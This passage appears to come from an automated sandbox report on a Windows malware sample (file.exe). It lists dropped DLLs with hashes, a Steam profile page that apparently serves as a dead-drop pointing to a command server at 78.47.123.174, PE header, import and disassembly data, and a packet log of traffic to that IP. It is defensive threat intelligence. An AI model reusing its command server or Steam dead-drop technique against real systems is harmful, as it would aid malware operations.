                                                                          • Filename: 5C8BGNPCno.exe, Detection: malicious
                                                                          • Filename: 66AF3M5zgO.exe, Detection: malicious
                                                                          • Filename: sSX92EpKXA.exe, Detection: malicious
                                                                          • Filename: file.exe, Detection: malicious
                                                                          • Filename: tTcrJ0HtoJ.exe, Detection: malicious
                                                                          • Filename: l2XteV3M4u.exe, Detection: malicious
                                                                          • Filename: 7067B48pY6.exe, Detection: malicious
                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                          Category:dropped
                                                                          Size (bytes):450024
                                                                          Entropy (8bit):6.673992339875127
                                                                          Encrypted:false
                                                                          SSDEEP:12288:McPa9C9VbL+3Omy5CvyOvzeOKdqhUgiW6QR7t5s03Ooc8dHkC2esGAWf:McPa90Vbky5CvyUeOKn03Ooc8dHkC2eN
                                                                          MD5:5FF1FCA37C466D6723EC67BE93B51442
                                                                          SHA1:34CC4E158092083B13D67D6D2BC9E57B798A303B
                                                                          SHA-256:5136A49A682AC8D7F1CE71B211DE8688FCE42ED57210AF087A8E2DBC8A934062
                                                                          SHA-512:4802EF62630C521D83A1D333969593FB00C9B38F82B4D07F70FBD21F495FEA9B3F67676064573D2C71C42BC6F701992989742213501B16087BB6110E337C7546
                                                                          Malicious:false
                                                                          Antivirus:
                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                          Category:dropped
                                                                          Size (bytes):2046288
                                                                          Entropy (8bit):6.787733948558952
                                                                          Encrypted:false
                                                                          SSDEEP:49152:fECf12gikHlnKGxJRIB+y5nvxnaOSJ3HFNWYrVvE4CQsgzMmQfTU1NrWmy4KoAzh:J7Tf8J1Q+SS5/nr
                                                                          MD5:1CC453CDF74F31E4D913FF9C10ACDDE2
                                                                          SHA1:6E85EAE544D6E965F15FA5C39700FA7202F3AAFE
                                                                          SHA-256:AC5C92FE6C51CFA742E475215B83B3E11A4379820043263BF50D4068686C6FA5
                                                                          SHA-512:DD9FF4E06B00DC831439BAB11C10E9B2AE864EA6E780D3835EA7468818F35439F352EF137DA111EFCDF2BB6465F6CA486719451BF6CF32C6A4420A56B1D64571
                                                                          Malicious:false
                                                                          Antivirus:
                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                          Category:dropped
                                                                          Size (bytes):257872
                                                                          Entropy (8bit):6.727482641240852
                                                                          Encrypted:false
                                                                          SSDEEP:6144:/yF/zX2zfRkU62THVh/T2AhZxv6A31obD6Hq/8jis+FvtVRpsAAs0o8OqTYz+xnU:/yRzX2zfRkX2T1h/SA5PF9m8jJqKYz+y
                                                                          MD5:4E52D739C324DB8225BD9AB2695F262F
                                                                          SHA1:71C3DA43DC5A0D2A1941E874A6D015A071783889
                                                                          SHA-256:74EBBAC956E519E16923ABDC5AB8912098A4F64E38DDCB2EAE23969F306AFE5A
                                                                          SHA-512:2D4168A69082A9192B9248F7331BD806C260478FF817567DF54F997D7C3C7D640776131355401E4BDB9744E246C36D658CB24B18DE67D8F23F10066E5FE445F6
                                                                          Malicious:false
                                                                          Antivirus:
                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                          Category:dropped
                                                                          Size (bytes):80880
                                                                          Entropy (8bit):6.920480786566406
                                                                          Encrypted:false
                                                                          SSDEEP:1536:lw2886xv555et/MCsjw0BuRK3jteo3ecbA2W86b+Ld:lw28V55At/zqw+Iq9ecbA2W8H
                                                                          MD5:A37EE36B536409056A86F50E67777DD7
                                                                          SHA1:1CAFA159292AA736FC595FC04E16325B27CD6750
                                                                          SHA-256:8934AAEB65B6E6D253DFE72DEA5D65856BD871E989D5D3A2A35EDFE867BB4825
                                                                          SHA-512:3A7C260646315CF8C01F44B2EC60974017496BD0D80DD055C7E43B707CADBA2D63AAB5E0EFD435670AA77886ED86368390D42C4017FC433C3C4B9D1C47D0F356
                                                                          Malicious:false
                                                                          Antivirus:
                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                          Category:dropped
                                                                          Size (bytes):2459136
                                                                          Entropy (8bit):6.052474106868353
                                                                          Encrypted:false
                                                                          SSDEEP:49152:WHoJ9zGioiMjW2RrL9B8SSpiCH7cuez9A:WHoJBGqabRnj8JY/9
                                                                          MD5:90E744829865D57082A7F452EDC90DE5
                                                                          SHA1:833B178775F39675FA4E55EAB1032353514E1052
                                                                          SHA-256:036A57102385D7F0D7B2DEACF932C1C372AE30D924365B7A88F8A26657DD7550
                                                                          SHA-512:0A2D112FF7CB806A74F5EC17FE097D28107BB497D6ED5AD28EA47E6795434BA903CDB49AAF97A9A99C08CD0411F1969CAD93031246DC107C26606A898E570323
                                                                          Malicious:false
                                                                          Antivirus:
                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                          File Type:HTML document, Unicode text, UTF-8 text, with very long lines (3041), with CRLF, LF line terminators
                                                                          Category:dropped
                                                                          Size (bytes):35638
                                                                          Entropy (8bit):5.381496025911681
                                                                          Encrypted:false
                                                                          SSDEEP:768:j7pqLtWYmwt5D0gqOciNGA7PzzgiJmDzJtxvrfukPco1AUmPzzgiJmDzJtxvJ2Sm:j78LtWYmwt5D0gqOcc7PzzgiJmDzJtxy
                                                                          MD5:A751191FBA24C5F431CCA2D021952D1D
                                                                          SHA1:F478B2FF9C3388CA5BC03EE2465782DD999CACC7
                                                                          SHA-256:3594B4D65F6C788A65C254B7AE427B34487790A970E32FAB79E7F93185F92C41
                                                                          SHA-512:BBBF3238A1739C359F91AF5C802E5D9D40CE616FF5B093CCDB21563B9F9DF87C3494272C366F41B8E42F81FC64F00FF3D5A16D56B7B98EFB7511A58F46FEF582
                                                                          Malicious:false
                                                                          Preview:<!DOCTYPE html>..<html class=" responsive" lang="en">..<head>...<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">.....<meta name="viewport" content="width=device-width,initial-scale=1">....<meta name="theme-color" content="#171a21">....<title>Steam Community :: r0is https://78.47.123.174|</title>...<link rel="shortcut icon" href="/favicon.ico" type="image/x-icon">...........<link href="https://community.cloudflare.steamstatic.com/public/shared/css/motiva_sans.css?v=GfSjbGKcNYaQ&amp;l=english&amp;_cdn=cloudflare" rel="stylesheet" type="text/css" >.<link href="https://community.cloudflare.steamstatic.com/public/shared/css/buttons.css?v=tuNiaSwXwcYT&amp;l=english&amp;_cdn=cloudflare" rel="stylesheet" type="text/css" >.<link href="https://community.cloudflare.steamstatic.com/public/shared/css/shared_global.css?v=E0c90DJSB6Ld&amp;l=english&amp;_cdn=cloudflare" rel="stylesheet" type="text/css" >.<link href="https://community.cloudflare.steamstatic.com/public/css/globalv2.cs
                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                          Category:dropped
                                                                          Size (bytes):685392
                                                                          Entropy (8bit):6.872871740790978
                                                                          Encrypted:false
                                                                          SSDEEP:12288:4gPbPpxMofhPNN0+RXBrp3M5pzRN4l2SQ+PEu9tUs/abAQb51FW/IzkOfWPO9UN7:4gPbPp9NNP0BgInfW2WMC4M+hW
                                                                          MD5:550686C0EE48C386DFCB40199BD076AC
                                                                          SHA1:EE5134DA4D3EFCB466081FB6197BE5E12A5B22AB
                                                                          SHA-256:EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
                                                                          SHA-512:0B7F47AF883B99F9FBDC08020446B58F2F3FA55292FD9BC78FC967DD35BDD8BD549802722DE37668CC89EDE61B20359190EFBFDF026AE2BDC854F4740A54649E
                                                                          Malicious:false
                                                                          Antivirus:
                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                          Category:dropped
                                                                          Size (bytes):608080
                                                                          Entropy (8bit):6.833616094889818
                                                                          Encrypted:false
                                                                          SSDEEP:12288:BlSyAom/gcRKMdRm4wFkRHuyG4RRGJVDjMk/x21R8gY/r:BKgcRKMdRm4wFkVVDGJVv//x21R8br
                                                                          MD5:C8FD9BE83BC728CC04BEFFAFC2907FE9
                                                                          SHA1:95AB9F701E0024CEDFBD312BCFE4E726744C4F2E
                                                                          SHA-256:BA06A6EE0B15F5BE5C4E67782EEC8B521E36C107A329093EC400FE0404EB196A
                                                                          SHA-512:FBB446F4A27EF510E616CAAD52945D6C9CC1FD063812C41947E579EC2B54DF57C6DC46237DED80FCA5847F38CBE1747A6C66A13E2C8C19C664A72BE35EB8B040
                                                                          Malicious:false
                                                                          Antivirus:
                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                          Category:dropped
                                                                          Size (bytes):450024
                                                                          Entropy (8bit):6.673992339875127
                                                                          Encrypted:false
                                                                          SSDEEP:12288:McPa9C9VbL+3Omy5CvyOvzeOKdqhUgiW6QR7t5s03Ooc8dHkC2esGAWf:McPa90Vbky5CvyUeOKn03Ooc8dHkC2eN
                                                                          MD5:5FF1FCA37C466D6723EC67BE93B51442
                                                                          SHA1:34CC4E158092083B13D67D6D2BC9E57B798A303B
                                                                          SHA-256:5136A49A682AC8D7F1CE71B211DE8688FCE42ED57210AF087A8E2DBC8A934062
                                                                          SHA-512:4802EF62630C521D83A1D333969593FB00C9B38F82B4D07F70FBD21F495FEA9B3F67676064573D2C71C42BC6F701992989742213501B16087BB6110E337C7546
                                                                          Malicious:false
                                                                          Antivirus:
                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                          Category:dropped
                                                                          Size (bytes):2046288
                                                                          Entropy (8bit):6.787733948558952
                                                                          Encrypted:false
                                                                          SSDEEP:49152:fECf12gikHlnKGxJRIB+y5nvxnaOSJ3HFNWYrVvE4CQsgzMmQfTU1NrWmy4KoAzh:J7Tf8J1Q+SS5/nr
                                                                          MD5:1CC453CDF74F31E4D913FF9C10ACDDE2
                                                                          SHA1:6E85EAE544D6E965F15FA5C39700FA7202F3AAFE
                                                                          SHA-256:AC5C92FE6C51CFA742E475215B83B3E11A4379820043263BF50D4068686C6FA5
                                                                          SHA-512:DD9FF4E06B00DC831439BAB11C10E9B2AE864EA6E780D3835EA7468818F35439F352EF137DA111EFCDF2BB6465F6CA486719451BF6CF32C6A4420A56B1D64571
                                                                          Malicious:false
                                                                          Antivirus:
                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                          Category:dropped
                                                                          Size (bytes):257872
                                                                          Entropy (8bit):6.727482641240852
                                                                          Encrypted:false
                                                                          SSDEEP:6144:/yF/zX2zfRkU62THVh/T2AhZxv6A31obD6Hq/8jis+FvtVRpsAAs0o8OqTYz+xnU:/yRzX2zfRkX2T1h/SA5PF9m8jJqKYz+y
                                                                          MD5:4E52D739C324DB8225BD9AB2695F262F
                                                                          SHA1:71C3DA43DC5A0D2A1941E874A6D015A071783889
                                                                          SHA-256:74EBBAC956E519E16923ABDC5AB8912098A4F64E38DDCB2EAE23969F306AFE5A
                                                                          SHA-512:2D4168A69082A9192B9248F7331BD806C260478FF817567DF54F997D7C3C7D640776131355401E4BDB9744E246C36D658CB24B18DE67D8F23F10066E5FE445F6
                                                                          Malicious:false
                                                                          Antivirus:
                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                          Category:dropped
                                                                          Size (bytes):80880
                                                                          Entropy (8bit):6.920480786566406
                                                                          Encrypted:false
                                                                          SSDEEP:1536:lw2886xv555et/MCsjw0BuRK3jteo3ecbA2W86b+Ld:lw28V55At/zqw+Iq9ecbA2W8H
                                                                          MD5:A37EE36B536409056A86F50E67777DD7
                                                                          SHA1:1CAFA159292AA736FC595FC04E16325B27CD6750
                                                                          SHA-256:8934AAEB65B6E6D253DFE72DEA5D65856BD871E989D5D3A2A35EDFE867BB4825
                                                                          SHA-512:3A7C260646315CF8C01F44B2EC60974017496BD0D80DD055C7E43B707CADBA2D63AAB5E0EFD435670AA77886ED86368390D42C4017FC433C3C4B9D1C47D0F356
                                                                          Malicious:false
                                                                          Antivirus:
                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                          File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                          Entropy (8bit):7.568806613547299
                                                                          TrID:
                                                                          • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                          • Generic Win/DOS Executable (2004/3) 0.02%
                                                                          • DOS Executable Generic (2002/1) 0.02%
                                                                          • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                          File name:file.exe
                                                                          File size:364'032 bytes
                                                                          MD5:f4fb6b518e2e550467f533124e1f80f4
                                                                          SHA1:964e735dd9410e07536e46b9f50c65fed148bcd7
                                                                          SHA256:0a456f0fee171826bb44c9c2e1d5e7b95c0862b67d9dd75a843dec035224bb74
                                                                          SHA512:4a02aa8aa87dab5d6aa14da695f71aa424b95bc4437c3b8353ac355e0a73f68ded2df49e6e2ca8af6e9389745861a78a7343ab4838a6584a1108e18525d5984a
                                                                          SSDEEP:6144:+vFPlgMF6peZUqbWFROY1NiXKvtuTx5qPmOGDe+VNfyhr24L25rQXxSXQMR23M:+9PlgMFgxy2u15emOqVNL4LQriM
                                                                          TLSH:A174D051B4C0C032DA73153649E0CEB5AF3DFD704E629E5B77950FBE4F342829A21A6A
                                                                          Icon Hash:00928e8e8686b000
                                                                          Entrypoint:0x40490e
                                                                          Entrypoint Section:.text
                                                                          Digitally signed:false
                                                                          Imagebase:0x400000
                                                                          Subsystem:windows gui
                                                                          Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                          DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                                                          Time Stamp:0x664E1555 [Wed May 22 15:55:01 2024 UTC]
                                                                          TLS Callbacks:
                                                                          CLR (.Net) Version:
                                                                          OS Version Major:6
                                                                          OS Version Minor:0
                                                                          File Version Major:6
                                                                          File Version Minor:0
                                                                          Subsystem Version Major:6
                                                                          Subsystem Version Minor:0
                                                                          Import Hash:3253afb4f76368b87a5ee602b0490ec8
                                                                          Instruction
                                                                          call 00007F6A954BA9DFh
                                                                          jmp 00007F6A954BA279h
                                                                          push ebp
                                                                          mov ebp, esp
                                                                          jmp 00007F6A954BA40Fh
                                                                          push dword ptr [ebp+08h]
                                                                          call 00007F6A954C3735h
                                                                          pop ecx
                                                                          test eax, eax
                                                                          je 00007F6A954BA411h
                                                                          push dword ptr [ebp+08h]
                                                                          call 00007F6A954C03FEh
                                                                          pop ecx
                                                                          test eax, eax
                                                                          je 00007F6A954BA3E8h
                                                                          pop ebp
                                                                          ret
                                                                          cmp dword ptr [ebp+08h], FFFFFFFFh
                                                                          je 00007F6A954B78A4h
                                                                          jmp 00007F6A954BACD2h
                                                                          push ebp
                                                                          mov ebp, esp
                                                                          push dword ptr [ebp+08h]
                                                                          call 00007F6A954BACE4h
                                                                          pop ecx
                                                                          pop ebp
                                                                          ret
                                                                          cmp ecx, dword ptr [00459500h]
                                                                          jne 00007F6A954BA403h
                                                                          ret
                                                                          jmp 00007F6A954BAD00h
                                                                          mov ecx, dword ptr [ebp-0Ch]
                                                                          mov dword ptr fs:[00000000h], ecx
                                                                          pop ecx
                                                                          pop edi
                                                                          pop edi
                                                                          pop esi
                                                                          pop ebx
                                                                          mov esp, ebp
                                                                          pop ebp
                                                                          push ecx
                                                                          ret
                                                                          mov ecx, dword ptr [ebp-10h]
                                                                          xor ecx, ebp
                                                                          call 00007F6A954BA3D9h
                                                                          jmp 00007F6A954BA3E2h
                                                                          push eax
                                                                          push dword ptr fs:[00000000h]
                                                                          lea eax, dword ptr [esp+0Ch]
                                                                          sub esp, dword ptr [esp+0Ch]
                                                                          push ebx
                                                                          push esi
                                                                          push edi
                                                                          mov dword ptr [eax], ebp
                                                                          mov ebp, eax
                                                                          mov eax, dword ptr [00459500h]
                                                                          xor eax, ebp
                                                                          push eax
                                                                          push dword ptr [ebp-04h]
                                                                          mov dword ptr [ebp-04h], FFFFFFFFh
                                                                          lea eax, dword ptr [ebp-0Ch]
                                                                          mov dword ptr fs:[00000000h], eax
                                                                          ret
                                                                          push eax
                                                                          push dword ptr fs:[00000000h]
                                                                          lea eax, dword ptr [esp+0Ch]
                                                                          sub esp, dword ptr [esp+0Ch]
                                                                          push ebx
                                                                          push esi
                                                                          push edi
                                                                          mov dword ptr [eax], ebp
                                                                          mov ebp, eax
                                                                          mov eax, dword ptr [00459500h]
Name                                  Virtual Address  Virtual Size  Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT          0x0              0x0
IMAGE_DIRECTORY_ENTRY_IMPORT          0x2599c          0x28          .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE        0x0              0x0
IMAGE_DIRECTORY_ENTRY_EXCEPTION       0x0              0x0
IMAGE_DIRECTORY_ENTRY_SECURITY        0x0              0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC       0x5c000          0x1950        .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG           0x23fc8          0x1c          .rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT       0x0              0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR       0x0              0x0
IMAGE_DIRECTORY_ENTRY_TLS             0x0              0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG     0x23f08          0x40          .rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT    0x0              0x0
IMAGE_DIRECTORY_ENTRY_IAT             0x1d000          0x140         .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT    0x0              0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR  0x0              0x0
IMAGE_DIRECTORY_ENTRY_RESERVED        0x0              0x0
Name    Virtual Address  Virtual Size  Raw Size  MD5                               Xored PE  ZLIB Complexity     File Type  Entropy             Characteristics
.text   0x1000           0x1a59f       0x1a600   7a4be43e7798d718a3189e9c95a8873f  False     0.5830772363744076  data       6.599097536818977   IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.bSs    0x1c000          0x315         0x400     8236d06e475da8010c7ad96cd639ab5e  False     0.6611328125        data       5.471102955664526   IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata  0x1d000          0x90d0        0x9200    5b6271d1f096eb8bfc69e2bbcdc71c35  False     0.3901434075342466  data       4.6943578990279455  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data   0x27000          0x34214       0x33400   eab33100d57aed41cd285a436b9b90e2  False     0.9837842987804878  data       7.983787706094081   IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.reloc  0x5c000          0x1950        0x1a00    61174616804a3bfe9b5e0cb126d91722  False     0.7570612980769231  data       6.485348470519483   IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
DLL           Import
KERNEL32.dll  CloseHandle, WaitForSingleObjectEx, CreateThread, VirtualAlloc, GetModuleHandleA, GetProcAddress, EncodePointer, DecodePointer, EnterCriticalSection, LeaveCriticalSection, InitializeCriticalSectionEx, DeleteCriticalSection, MultiByteToWideChar, WideCharToMultiByte, LCMapStringEx, GetStringTypeW, GetCPInfo, IsProcessorFeaturePresent, QueryPerformanceCounter, GetCurrentProcessId, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, IsDebuggerPresent, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetStartupInfoW, GetModuleHandleW, GetCurrentProcess, TerminateProcess, CreateFileW, RaiseException, RtlUnwind, GetLastError, SetLastError, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, FreeLibrary, LoadLibraryExW, GetStdHandle, WriteFile, GetModuleFileNameW, ExitProcess, GetModuleHandleExW, GetCommandLineA, GetCommandLineW, HeapAlloc, HeapFree, CompareStringW, LCMapStringW, GetLocaleInfoW, IsValidLocale, GetUserDefaultLCID, EnumSystemLocalesW, GetFileType, FlushFileBuffers, GetConsoleOutputCP, GetConsoleMode, ReadFile, GetFileSizeEx, SetFilePointerEx, ReadConsoleW, HeapReAlloc, FindClose, FindFirstFileExW, FindNextFileW, IsValidCodePage, GetACP, GetOEMCP, GetEnvironmentStringsW, FreeEnvironmentStringsW, SetEnvironmentVariableW, SetStdHandle, GetProcessHeap, HeapSize, WriteConsoleW
Timestamp  Source Port  Dest Port  Source IP  Dest IP
                                                                          May 22, 2024 18:28:06.536799908 CEST4434970678.47.123.174192.168.2.6
                                                                          May 22, 2024 18:28:06.536823034 CEST49706443192.168.2.678.47.123.174
                                                                          May 22, 2024 18:28:06.536835909 CEST49706443192.168.2.678.47.123.174
                                                                          May 22, 2024 18:28:06.542674065 CEST4434970678.47.123.174192.168.2.6
                                                                          May 22, 2024 18:28:06.542695999 CEST4434970678.47.123.174192.168.2.6
                                                                          May 22, 2024 18:28:06.542757034 CEST49706443192.168.2.678.47.123.174
                                                                          May 22, 2024 18:28:06.542764902 CEST4434970678.47.123.174192.168.2.6
                                                                          May 22, 2024 18:28:06.542804003 CEST49706443192.168.2.678.47.123.174
                                                                          May 22, 2024 18:28:06.547789097 CEST4434970678.47.123.174192.168.2.6
                                                                          May 22, 2024 18:28:06.547808886 CEST4434970678.47.123.174192.168.2.6
                                                                          May 22, 2024 18:28:06.547849894 CEST49706443192.168.2.678.47.123.174
                                                                          May 22, 2024 18:28:06.547858000 CEST4434970678.47.123.174192.168.2.6
                                                                          May 22, 2024 18:28:06.547885895 CEST49706443192.168.2.678.47.123.174
                                                                          May 22, 2024 18:28:06.547907114 CEST49706443192.168.2.678.47.123.174
                                                                          May 22, 2024 18:28:06.553137064 CEST4434970678.47.123.174192.168.2.6
                                                                          May 22, 2024 18:28:06.553164005 CEST4434970678.47.123.174192.168.2.6
                                                                          May 22, 2024 18:28:06.553284883 CEST49706443192.168.2.678.47.123.174
                                                                          May 22, 2024 18:28:06.553313971 CEST4434970678.47.123.174192.168.2.6
                                                                          May 22, 2024 18:28:06.553350925 CEST49706443192.168.2.678.47.123.174
                                                                          May 22, 2024 18:28:06.556845903 CEST4434970678.47.123.174192.168.2.6
                                                                          May 22, 2024 18:28:06.556889057 CEST4434970678.47.123.174192.168.2.6
                                                                          May 22, 2024 18:28:06.556931973 CEST49706443192.168.2.678.47.123.174
                                                                          May 22, 2024 18:28:06.556941032 CEST4434970678.47.123.174192.168.2.6
                                                                          May 22, 2024 18:28:06.556986094 CEST49706443192.168.2.678.47.123.174
                                                                          May 22, 2024 18:28:06.561461926 CEST4434970678.47.123.174192.168.2.6
                                                                          May 22, 2024 18:28:06.561502934 CEST4434970678.47.123.174192.168.2.6
                                                                          May 22, 2024 18:28:06.561534882 CEST49706443192.168.2.678.47.123.174
                                                                          May 22, 2024 18:28:06.561544895 CEST4434970678.47.123.174192.168.2.6
                                                                          May 22, 2024 18:28:06.561559916 CEST49706443192.168.2.678.47.123.174
                                                                          May 22, 2024 18:28:06.561582088 CEST49706443192.168.2.678.47.123.174
                                                                          May 22, 2024 18:28:06.566565990 CEST4434970678.47.123.174192.168.2.6
                                                                          May 22, 2024 18:28:06.566596985 CEST4434970678.47.123.174192.168.2.6
                                                                          May 22, 2024 18:28:06.566627979 CEST49706443192.168.2.678.47.123.174
                                                                          May 22, 2024 18:28:06.566636086 CEST4434970678.47.123.174192.168.2.6
                                                                          May 22, 2024 18:28:06.566668987 CEST49706443192.168.2.678.47.123.174
                                                                          May 22, 2024 18:28:06.570444107 CEST4434970678.47.123.174192.168.2.6
                                                                          May 22, 2024 18:28:06.570463896 CEST4434970678.47.123.174192.168.2.6
                                                                          May 22, 2024 18:28:06.570502043 CEST49706443192.168.2.678.47.123.174
                                                                          May 22, 2024 18:28:06.570508957 CEST4434970678.47.123.174192.168.2.6
                                                                          May 22, 2024 18:28:06.570533991 CEST49706443192.168.2.678.47.123.174
                                                                          May 22, 2024 18:28:06.570539951 CEST49706443192.168.2.678.47.123.174
                                                                          May 22, 2024 18:28:06.580591917 CEST4434970678.47.123.174192.168.2.6
                                                                          May 22, 2024 18:28:06.580620050 CEST4434970678.47.123.174192.168.2.6
                                                                          May 22, 2024 18:28:06.580684900 CEST49706443192.168.2.678.47.123.174
                                                                          May 22, 2024 18:28:06.580692053 CEST4434970678.47.123.174192.168.2.6
                                                                          May 22, 2024 18:28:06.580707073 CEST49706443192.168.2.678.47.123.174
                                                                          May 22, 2024 18:28:06.580727100 CEST49706443192.168.2.678.47.123.174
                                                                          May 22, 2024 18:28:06.587518930 CEST4434970678.47.123.174192.168.2.6
                                                                          May 22, 2024 18:28:06.587546110 CEST4434970678.47.123.174192.168.2.6
                                                                          May 22, 2024 18:28:06.587599039 CEST49706443192.168.2.678.47.123.174
                                                                          May 22, 2024 18:28:06.587608099 CEST4434970678.47.123.174192.168.2.6
                                                                          May 22, 2024 18:28:06.587621927 CEST49706443192.168.2.678.47.123.174
                                                                          May 22, 2024 18:28:06.587656975 CEST49706443192.168.2.678.47.123.174
                                                                          May 22, 2024 18:28:06.589287043 CEST4434970678.47.123.174192.168.2.6
                                                                          May 22, 2024 18:28:06.589322090 CEST4434970678.47.123.174192.168.2.6
                                                                          May 22, 2024 18:28:06.589355946 CEST49706443192.168.2.678.47.123.174
                                                                          May 22, 2024 18:28:06.589361906 CEST4434970678.47.123.174192.168.2.6
                                                                          May 22, 2024 18:28:06.589375019 CEST49706443192.168.2.678.47.123.174
                                                                          May 22, 2024 18:28:06.589395046 CEST49706443192.168.2.678.47.123.174
                                                                          May 22, 2024 18:28:06.596333027 CEST4434970678.47.123.174192.168.2.6
                                                                          May 22, 2024 18:28:06.596357107 CEST4434970678.47.123.174192.168.2.6
                                                                          May 22, 2024 18:28:06.596487999 CEST49706443192.168.2.678.47.123.174
                                                                          May 22, 2024 18:28:06.596510887 CEST4434970678.47.123.174192.168.2.6
                                                                          May 22, 2024 18:28:06.596553087 CEST49706443192.168.2.678.47.123.174
                                                                          May 22, 2024 18:28:06.601226091 CEST4434970678.47.123.174192.168.2.6
                                                                          May 22, 2024 18:28:06.601253033 CEST4434970678.47.123.174192.168.2.6
                                                                          May 22, 2024 18:28:06.601310968 CEST49706443192.168.2.678.47.123.174
                                                                          May 22, 2024 18:28:06.601319075 CEST4434970678.47.123.174192.168.2.6
                                                                          May 22, 2024 18:28:06.601355076 CEST49706443192.168.2.678.47.123.174
                                                                          May 22, 2024 18:28:06.605137110 CEST4434970678.47.123.174192.168.2.6
                                                                          May 22, 2024 18:28:06.605185032 CEST4434970678.47.123.174192.168.2.6
                                                                          May 22, 2024 18:28:06.605211973 CEST49706443192.168.2.678.47.123.174
                                                                          May 22, 2024 18:28:06.605220079 CEST4434970678.47.123.174192.168.2.6
                                                                          May 22, 2024 18:28:06.605241060 CEST49706443192.168.2.678.47.123.174
                                                                          May 22, 2024 18:28:06.605261087 CEST49706443192.168.2.678.47.123.174
                                                                          May 22, 2024 18:28:06.610065937 CEST4434970678.47.123.174192.168.2.6
                                                                          May 22, 2024 18:28:06.610109091 CEST4434970678.47.123.174192.168.2.6
                                                                          May 22, 2024 18:28:06.610138893 CEST49706443192.168.2.678.47.123.174
                                                                          May 22, 2024 18:28:06.610146999 CEST4434970678.47.123.174192.168.2.6
                                                                          May 22, 2024 18:28:06.610169888 CEST49706443192.168.2.678.47.123.174
                                                                          May 22, 2024 18:28:06.610193014 CEST49706443192.168.2.678.47.123.174
                                                                          May 22, 2024 18:28:06.611840963 CEST4434970678.47.123.174192.168.2.6
                                                                          May 22, 2024 18:28:06.611882925 CEST4434970678.47.123.174192.168.2.6
                                                                          May 22, 2024 18:28:06.611912012 CEST49706443192.168.2.678.47.123.174
                                                                          May 22, 2024 18:28:06.611922026 CEST4434970678.47.123.174192.168.2.6
                                                                          May 22, 2024 18:28:06.611932993 CEST49706443192.168.2.678.47.123.174
                                                                          May 22, 2024 18:28:06.611952066 CEST49706443192.168.2.678.47.123.174
                                                                          May 22, 2024 18:28:06.615087986 CEST4434970678.47.123.174192.168.2.6
                                                                          May 22, 2024 18:28:06.615130901 CEST4434970678.47.123.174192.168.2.6
                                                                          May 22, 2024 18:28:06.615159035 CEST49706443192.168.2.678.47.123.174
